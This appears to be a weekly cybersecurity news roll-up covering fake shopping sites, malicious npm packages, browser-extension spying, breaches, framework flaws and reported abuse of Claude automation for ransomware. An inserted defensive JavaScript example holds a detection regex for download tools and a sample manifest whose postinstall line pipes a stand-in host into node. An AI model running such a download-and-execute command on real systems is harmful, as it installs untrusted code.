Weekly Cyber News Rollup, December 5th, 2025

This is your weekly cyber news roll-up for the week ending December 5th, 2025.

You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber dot news.

Attackers are flooding the holiday season with fake festive shopping sites that mimic well known retailers and couriers. Researchers have tracked more than eighteen thousand such domains that copy logos, checkout pages, and those reassuring padlock icons. This matters right now because rushed mobile shoppers are being siphoned into bogus checkouts where every payment can turn into stolen card data or counterfeit goods. Consumers, card issuers, and brands that run heavy Christmas and Black Friday promotions are all feeling the sting as complaints and chargebacks climb. Today the response is focused on watching new look alike domains, tightening filters on holiday themed lures, and refreshing safe shopping guidance before the rush peaks.

Researchers in a separate study have spotted more than two thousand cloned online stores parked right beside real Cyber Monday deals. These fake sites copy layouts, logos, and even review snippets from genuine merchants, then quietly route payments through attacker controlled gateways. The situation matters this week because discount hunters are sliding into a shadow marketplace where every checkout could be pure card theft. Smaller and mid sized online merchants that rely on shared platforms, along with their payment processors and acquiring banks, are the most exposed. Current efforts center on tightening merchant verification, ramping up brand impersonation takedowns, and steering customers toward clearly verified official storefronts.

Security researchers have also turned a spotlight on popular developer paste and quick formatting tools that are quietly holding thousands of passwords and secret keys. Many engineers use these web utilities to clean up configuration files, logs, or code snippets before sharing them, assuming the content disappears quickly. Reality looks different this week because some sites store pastes for long periods, log them for analytics, or leave them discoverable through guessable links that attackers and search engines can find. Distributed engineering teams and sectors like finance, healthcare, and critical infrastructure that share configs during incidents are particularly exposed. Right now the push is toward banning unmanaged paste tools for sensitive data, offering secure internal alternatives, and routinely searching for leaked credentials tied to corporate domains.

A long running campaign linked to North Korean operators is using nearly two hundred malicious software packages to trap developers in public repositories. These packages pose as helpful add ons or utilities but hide installation scripts that pull down malware once they get added to a build. The issue matters today because it quietly converts trusted development environments into stepping stones for espionage and theft without any obvious user mistake. Software vendors, technology startups, and teams that allow direct internet access from build servers or let developers choose packages without review are squarely in the danger zone. Immediate defensive work is focused on allow lists for critical ecosystems, deeper inspection of package metadata and install scripts, and tighter monitoring of build environments for strange outbound traffic or new tools.

Millions of users running Chrome and Edge installed seemingly harmless extensions that turned out to be part of the ShadyPanda spying campaign. These add ons offered real convenience features on the surface, yet under the hood they could run remote code and siphon data from visited sites. The story matters now because everyday browsing, including access to work software as a service and sensitive business portals, has been turned into a rich stream of credentials and session tokens. Organizations that lean heavily on browser based customer relationship management, human resources, and finance tools are especially exposed since stolen sessions can bypass strong logins. Current actions focus on auditing and removing unnecessary extensions, shrinking to a small approved list, and watching remaining add ons for unusual network calls.

Investigators have tied nominally commercial Chinese front companies to advanced steganography products tailored for government aligned hacking teams. These tools make it simple to hide commands, stolen data, and malicious payloads inside normal looking images and documents that flow through email, chat, and collaboration platforms. The development is important this week because it shows steganography moving from rare specialty tradecraft into off the shelf gear for day to day campaigns. High value government networks, telecom providers, and large enterprises that rely on media rich portals and image heavy workflows are most at risk. Defenders are responding by hardening monitoring around media and document flows, looking for odd image patterns and reuse, and exploring advanced inspection that can spot steganography like behavior in files and traffic.

In South Korea, attackers turned more than one hundred twenty thousand internet connected home cameras into a pipeline of intimate videos. They quietly recorded people in bedrooms, living rooms, and bathrooms, then sold that footage through an adult site that industrialized voyeurism with consumer smart devices. The story matters today because it shows how weak default security and poor monitoring can transform household hardware into a long running privacy catastrophe. Any business that sells, deploys, or manages cameras or smart devices, along with organizations that rely on unmanaged cameras in offices, hotels, clinics, or campuses, is implicated by this model. Current responses emphasize stronger authentication and encryption, blocking direct internet exposure, and using asset and log reviews to regularly confirm that only approved services can reach live camera feeds.

Security teams have linked nearly two hundred malicious software packages in a major JavaScript ecosystem to North Korean actors. These packages were uploaded to public registries where developers routinely pull dependencies and often masqueraded as useful tools or misspelled versions of real libraries. The development matters now because those packages have been downloaded tens of thousands of times, likely reaching real build systems and production pipelines. Organizations that lean on open source packages with default trust, especially where developer devices and continuous integration servers sit outside strict hardening, are most at risk. Defenders are responding by enforcing approved registries and package allow lists, locking down build environments, and reviewing code and traffic to ensure no unvetted dependencies are sliding into production.
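The two items above on malicious packages both end with the same defensive advice: allow lists, inspection of install scripts, and watching for misspelled versions of real libraries. The following is an added example, not code from the rollup or from any named project, that vets constructed package manifests along those lines; the allow list, the suspicious-command pattern, and the sample manifests are all assumptions for illustration.

```javascript
// Vet dependency manifests: flag packages missing from an allow list, names that
// look like typosquats of allow-listed libraries, and install-time lifecycle
// scripts that fetch or decode code. All package data here is constructed.

// Assumed allow list of vetted package names (replace with your own)
const ALLOW_LIST = ["express", "lodash", "react", "axios"];

// npm runs these hooks automatically during install
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Assumed pattern for download-and-run or decode-and-eval behaviour in a script
const SUSPICIOUS_SCRIPT = /\b(curl|wget|Invoke-WebRequest|base64\s+-d|atob\(|eval\()/i;

// Edit distance with insert, delete, substitute and adjacent transposition,
// so "lodahs" is one edit from "lodash" (a typical typosquat)
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, (_, i) => [i, ...Array(b.length).fill(0)]);
  for (let j = 1; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1);
      }
    }
  }
  return d[a.length][b.length];
}

// Return a list of findings for one manifest ({ name, version, scripts })
function vetPackage(manifest) {
  const findings = [];
  if (!ALLOW_LIST.includes(manifest.name)) {
    const near = ALLOW_LIST.find((ok) => editDistance(manifest.name, ok) <= 2);
    findings.push(near ? `possible typosquat of ${near}` : "not on allow list");
  }
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = manifest.scripts && manifest.scripts[hook];
    if (cmd && SUSPICIOUS_SCRIPT.test(cmd)) findings.push(`${hook} script fetches or decodes code: ${cmd}`);
  }
  return findings;
}

// Constructed manifests: one clean, one typosquat carrying a postinstall dropper
const SAMPLE_MANIFESTS = [
  { name: "express", version: "4.19.2", scripts: {} },
  { name: "expres", version: "1.0.3", scripts: { postinstall: "curl -s http://example.invalid/x | node" } },
];

// Map each package name to its findings; an empty array means nothing flagged
function vetAll(manifests) {
  return Object.fromEntries(manifests.map((m) => [m.name, vetPackage(m)]));
}
```

Running `vetAll(SAMPLE_MANIFESTS)` flags the misspelled package twice (typosquat and install-time download) and leaves the allow-listed one clean; in a real pipeline the manifests would be read from node_modules or a lockfile before install hooks are allowed to run.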

Shopping giant Coupang has provided a more formal disclosure that attackers accessed personal information on about thirty four million customers over roughly five months. The exposed data includes names, contact details, addresses, and partial payment information, though the company says passwords and full card numbers were not taken. This update matters because long dwell time combined with tight privacy laws can compound both reputational damage and regulatory penalties. Customers in a flagship digital brand market, along with partners, regulators, and card issuers, are demanding clearer answers on detection and data handling. Current work focuses on tightening monitoring and segmentation around customer data platforms and running reviews to ensure anomalous data access and long lived sessions would be detected faster in the future.

A new Android security update has landed with fixes for two vulnerabilities already exploited in targeted attacks along with more than one hundred additional flaws. These exploited bugs could allow attackers to escalate privileges or bypass key protections on affected phones and tablets depending on the specific stack. The issue is pressing because Android updates must travel through both Google and device makers, so many devices will not receive patches quickly. Executives, frontline staff, and operational teams using unmanaged or bring your own Android fleets are particularly exposed as these devices quietly age out of proper update cycles. Priority actions now include pushing high risk users onto the latest security patch levels and confirming through mobile device management reports which builds remain unsupported or out of date.

Researchers have demonstrated how low code automation features in Claude can be abused to deliver MedusaLocker ransomware across an organization. By chaining skills that move files, invoke scripts, and touch external systems, an attacker with one stolen account can turn a friendly workflow into a rapid malware pipeline. This matters right now because it shows artificial intelligence automation acting as a new control plane that can move data and code at scale, not just a simple helper. Organizations that allow artificial intelligence platforms to touch production file shares, ticketing systems, or cloud resources without strong guardrails are the most exposed. Defenders are starting to treat automation platforms like privileged access systems, adding strict scoping, change review for powerful workflows, and detailed execution logging to spot abuse patterns.

Attackers are pushing a fake Atlas browser that pretends to be a premium ChatGPT style client but actually installs password stealing malware. The ClickFix campaign uses polished marketing pages and social posts to convince people they are getting faster or cheaper access to artificial intelligence tools. This threat matters today because the malware quietly harvests saved passwords, cookies, and session tokens from mainstream browsers, then uses them to open corporate mail, cloud dashboards, or banking sites without new logins. Companies with bring your own device policies and weak separation between work and personal browsing are particularly exposed as home experiments jump into work accounts. Security teams are responding by blocking unapproved browser like executables, reinforcing training about downloading artificial intelligence tools only from vetted sources, and tightening controls around how corporate credentials are stored in personal browsers.

Researchers have disclosed a pair of maximum severity flaws affecting core services used by many cloud providers, raising the possibility of cross tenant data access. In worst case scenarios, a malicious tenant could escape their own environment and reach resources belonging to other customers sharing the same infrastructure. The discovery matters right now because early estimates suggest more than a third of providers might use the impacted components, and not all have finished mitigation. Companies that lean on multi tenant platform services instead of dedicated instances are especially exposed if noisy neighbors turn hostile. Customers are pressing providers for written impact statements, patch status, and detection details while aligning internal monitoring to look for unusual cross account access patterns and spikes in permission failures on newly patched services.

Finally, a critical set of bugs in React Server Components and the Next.js framework has exposed some modern web applications to unauthenticated remote code execution. An attacker who can reach a vulnerable endpoint may be able to run arbitrary code on the servers behind customer facing sites. This matters this week because those versions are common in high traffic marketing, account, and self service portals, and proof of concept exploits are already public. Organizations that use these frameworks for dashboards, checkout flows, or support portals are among the most exposed when server side components hold secrets and business logic. Teams are now fast tracking framework upgrades for exposed apps, adding temporary web application firewall rules for known exploit patterns, and combing server logs for any signs of successful code execution during the vulnerable window.

That’s the BareMetalCyber Weekly Roll-Up for the week ending December 5th, 2025. For more, visit BareMetalCyber dot com. You can also subscribe to the newsletter and view the archive of previous headlines at daily cyber news dot com. We’ll be back next week.
